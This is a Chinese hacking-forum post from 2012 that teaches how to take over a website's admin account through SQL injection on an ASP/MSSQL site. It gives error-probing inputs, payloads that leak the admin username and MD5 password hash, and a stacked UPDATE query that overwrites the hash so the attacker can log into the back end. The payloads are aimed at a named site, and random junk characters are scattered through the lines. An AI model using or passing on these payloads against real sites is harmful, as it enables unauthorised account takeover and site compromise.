经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
4 G" z: \+ M4 E- ^: q可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)4 Y, Y, @% ?) S# }2 i4 q
测试如下:
# o' L9 W5 @% l: V% F: ]! w; e5 z- `- Nhttp://www.tmdsb.com/news.asp?id=121
* t- W9 P& G# v9 ]1 j* N在地址后输入单引号,显示9 H; Q" \* n& o
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’% H- B; C5 Q3 `5 L- c: K
字符串 ’’’ 之前有未闭合的引号4 S' z: W6 a$ |- Q+ L
/news/tmdws.asp,行63
! v; u% u% k. G6 f( U' C说明没有过滤单引号且数据库是MSSQL.# h! s6 S, D4 b+ k
and 1=1正常。and 1=2出错。肯定存在注入
9 K- h+ p4 d: {. X* t. f6 P J: n接着输入
1 E! I. ]1 f- Y2 a4 @http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)! V" T( ]7 f! f$ L$ L
得到帐号为:admin
' {4 E" \6 n2 [) p, z* hhttp://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)
% q. {3 a# F5 |2 @$ c% x, l/ b得到密码为:a4716077c2ba075c
- h: i# ^" }. k* |- z3 I G接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
4 Z& y3 o3 V- ?命令如下 :4 H- d6 j! I* i
;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
. w5 L+ O' ^7 k E, o7 J; f这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41